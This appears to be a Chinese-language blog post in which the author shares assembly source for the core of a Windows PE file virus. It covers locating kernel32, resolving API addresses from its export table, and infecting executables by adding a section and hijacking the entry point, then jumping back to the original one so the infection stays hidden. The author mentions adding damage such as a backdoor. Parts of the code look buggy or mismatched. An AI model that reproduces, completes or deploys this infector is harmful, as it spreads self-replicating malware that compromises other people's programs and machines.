关于那个PE文件病毒

今天把１０．１期间写的那个PE文件病毒的关键部分贴上来．

　　首先说说PE文件病毒的工作方式．一个PE文件病毒基本上有这几个功能：

１）获取kernel32.dll的基地址
２）通过所获得的kernel32的基地址通过dll的PE文件格式中的输出表获得以后要使用到的API的地址，并将他

们存放在变量或是栈中，将来所调用的API直接通过CALL这些地址来实现．
３）查找要感染的文件并获得他们的基地址（通过CreateFile,CreateFileMapping,ViewOfMapFile将文件打开

，当然调用的是getapi所找到的地址。其他过程和一般的程序没什么区别，所以就不写在这里了）
４）通过获得的文件的基地址来根据文件的PE文件格式来将病毒代码注入到该文件中，在这里有两种方法，１

．是通过给程序添加一个节（section)来将病毒注入，另一种是选取一个未用完的节（因为节在内存中是按１

０００为单位对齐的）．
   当然了，病毒不可能只是复制自己而什么都不做，不然的话就没有破坏性了．．．在代码里都会有一段用来

做点坏事～～比如开个后门～～
   好了，我们来具体看看这些有趣的东西～～～嘿嘿
第一个部分，获取K32的基地址
_GetK32 proc
        local @dwReturn
        pushad
        mov   @dwReturn,0　　　　　　　;返回值，先设为0（即false）
        mov   edi,_dwKernelRet　　　   ;这里的_dwKernel32Ret　是[esp]，当程序通过ret指令结       

                                       ;束的时候,系统会通过调用CreateProcess()函数来启动进       

                                       ;程，这时的堆栈中所存放的值就是Kernel32所在的那部分       

                                       ;地址段中的一个地址。因此，如果我们在程序中的开头部       

                                       ;分取出[esp]的值，就能通过这个值定位kernel32的基地        

                                       ;址　　　　　　　　　　　　
        and   edi,0ffff0000h           ;因为WINDOWS是分页系统，4K一页，所以这条语句就是将        

                                       ;edi指向该页的基地址
@1:                                    ;由于分页系统中模块加载都是从每一页的页首开始，所以       

                                       ;基地址总每页的页首地址
        cmp word ptr [edi],'ZM'        ;这一段是判断是否到达K32的基地址
        jnz @1
        mov esi,edi
        add esi,[esi+003ch]
        cmp word ptr [esi],'EP'
        mov @dwReturn,edi
        jz @2                         ;确认找到的是K32的基地址，跳
        sub edi,010000h               ;不是K32的基地址，则查看是不是在前一页             
        cmp edi,070000000h           
        jb @2                         ;如果小于07000000则不查找，因为K32不会在小于               

                                      ;070000000前的页，在这里为了简单没有考虑出错情况，一       

                                      ;般出错的话就直接结束吧
        jmp @1
@2:     add esp,0ch
        popad
        mov eax,@dwReturn             ;将找到的K32的基地址给EAX返回
        ret
_GetK32 endp

第2部分，GetApi部分
_GetApi proc                          ;输入ESI（指向一个API名字）输出该API的地址
        mov edx,esi                   ;先将该API名字的首地址备份个
@1:     cmp byte ptr [esi],0          ;这一段是获取API名字的长度，因为以0作为字符串结束的        

                                      ;标记，所以比较esi所指地址的值是否为0来判断是否是字        

                                      ;符串的结束
        jz @2                         ;是，跳
 inc esi                       ;不是则让ESI指向下一个字符，继续判断
 jmp @1

@2的目的就是获取，输出地址表eat,存放输出的API的名字的数组ent和输出序数表eot的VA。之所以要取这3个

是因为eat[x]的所对应的API并不就是ent[x]对应的API.实际上他们3者的API对应关系是ent[x]'API=eat[eot

[x]]'API

@2:     inc esi                      
        sub esi,edx                   ;esi-edx就是API的字符串长度了
 mov ecx,esi
 xor eax,eax
        mov count,ax                  ;COUNT存放所输入的API在ENT的数组序号（即对应关系中的       

                                      ;X）
 mov esi,hDllKernel32         
 add esi,3ch                   ;即让ESI指向NT头，3c是dos头的长度
 mov esi,[esi+78h]             ;让ESI指向DATA DIRECTORY数组的首地址（这个值是RVA）
                                      ;由于输出表是放在数组的第一个，所以所指的这个数组的        

                                      ;首地址的RVA就是输出表的首地址的RVA
 add esi,hDllKernel32          ;输出表的VA
 add esi,1ch                   ;ESI指向AddressOfFunctions
        lodsd                         ;读取AddressOfFunctions的内容         
 add eax,hDllKernel32          ;EAT(输出地址表）的VA
 mov eatVA,eax
 lodsd                         ;读取AddressOfNames的内容
 add eax,hDllKernel32          ;ENT（存放输出的API的名字的数组）
 mov entVA,eax                
 lodsd                         ;读取输出序数表EOT的RVA
 add eax,hDllKernel32          ;VA
 mov OrdinalVA,eax
 mov esi,entVA

而@3就是先比较所要得到地址的API名和ENT中的各名字对比找到EAT，ENT，EOT对应关系中的X，然后得到该API

的地址

@3:     push esi                     
        lodsd
        add eax,hDllKernel32  ;数组指针
 mov esi,eax
 mov edi,edx
 push ecx              ;该API名字的长度
 cld
 rep cmpsb             ;比较这时数组指针所指的API名是否是输入的那个API名
 pop ecx
 jz @4                 ;是，跳
 pop esi
 add esi,4             ;不是，指向下一个数组中的API名字继续比较
 inc Count 
 jmp @3
@4:     pop esi
        mov eax,Count         ;进行对应关系的转换
 shl eax,1
 add eax,OrdinalVA    ;EAX中地址存放的就是EOT[X]
 xor esi,esi
        xchg eax,esi
        lodsw
 shl eax,2
 add eax,eatVA      
 mov esi，eax
 lodsd                ;读取eat[eot[x]]的内容（API的RVA地址）
 add eax,hDllKernel32 ；VA
 ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetApis proc               ;输入的是ESI（指向存放API名字的数组）和EDI（指向存放                 

                     ;API函数所在地址的数组）
@1:      push esi
  push edi
  call _GetApi
  pop edi
  pop esi
  stosd
@2:      cmp byte ptr [esi],0    ；判断是否是一个API名的结束
         jz @3
  inc esi
  jmp @2
@3:      cmp word ptr [esi],0bbh ；判断是否是数组的结束
         jz @4                   ;是，则结束
  inc esi                 ；不是，指向下一个API名，继续查找他的地址
  jmp @1
@4:      ret
_GetApis endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
第3部分：感染~~
如之前所讲的，感染有两种方式，在这里我们采用了第一种方式。这个函数的工作方式是这样的：
1）将代码添加到一个新节中，我们先将一个指针指向文件中的最后的一个节的结尾，从这里把我们的代码写到

后面。另一个指针指向到最后的那个节对应的section header修改PointerToRawData和SizeOfRawData让它指向

的是我们添加的那个节。
2）记录下未感染的OEP，因为在我们的代码结束的时候要让宿主程序正常执行（除非你想让人家知道自己被感

染了。。。）所以我们要先记录他的OEP，在我们程序结束的时候运用一个JMP跳过去。
3）修改nt头中的AddressOfEntryPoint，让它指向的是我们的添加的代码

_Inject proc                               ;lpFile是文件的基地址，lpPEHead是nt头
        mov esi,_lpPEHead
 mov edi,_lpPEHead
 movzx eax,[esi+06h]                ;NumberOfSections
 dec eax
 mov ecx,28h                        ;28h为一个section header的长度                       
 mul ecx                            ;eax中为所有section header部分的长度
 add esi,eax
 add esi,78h                        ;减去data_directory的nt header长度
 mov edx,[edi+74h]
 shl edx,3                          ;edx存放计算出的data_directory长度
 add esi,edx                        ;esi指向了最后一个section header
 mov _Oldep,[edi+28h]               ;存下AddressOfEntryPoint
 mov _ImageBase,[edi+34h]     
 mov _SizeOfRawData,[esi+10h]
 mov _PointerToRawData,[esi+14h]
 mov edx,_PointerToRawData
 add edx,_SizeOfRawData
 mov _AllSecHeadLength,edx          
 mov eax,_SizeOfRawData
 add eax,[esi+0ch]                   ;+VA,则在eax所指的地址添加病毒代码，且此时的EAX为new 

                                           ；ep
        mov _Newep,eax
 mov [edi+28h],eax                   ;将旧的ep覆盖为新的
        mov eax,[esi+10h]                   ;
 invoke _Align,_dwVirusSize,[esi+3ch] ;将我们的节对齐
 mov [esi+08h],eax                   ;更新对齐后的SIZEOFRAWDATA和VIRTUALSIZE
 mov [esi+10h],eax
        add eax,[esi+0ch]                    ;eax=size of image(加上了新加的节的长度）
 mov [edi+50h],eax
 or  dword ptr [esi+24h],0a0000020h   ；该节属性定为可执行代码
 mov dword ptr [edi+4ah],"Zalone"     ；节的名字enolaZ~~~~~~
 lea esi,[ebp+virus_start]            ;把我们的代码移进去
 mov edx,_AllSecHeadLength
 xchg edi,edx
 add edi,_lpFile
 mov ecx,virus_size
 repnz movsb                          ；写代码的循环
 jmp UnMapFile                        ;完成，关闭这个文件
        ret
InjectFile endp
好了，关键的部分就是这个样子，主体部分我觉得其实是最简单的，感觉代码还不是很优化，另外这个东西也

没有一些反调试或是隐藏自己的方法.另外在对eot,ent,eat那部分感觉的讲解还不是很清晰，可能是好久没写

过作文了吧~。不管怎么说，写的累了。不过还有别的有趣的东西可以研究~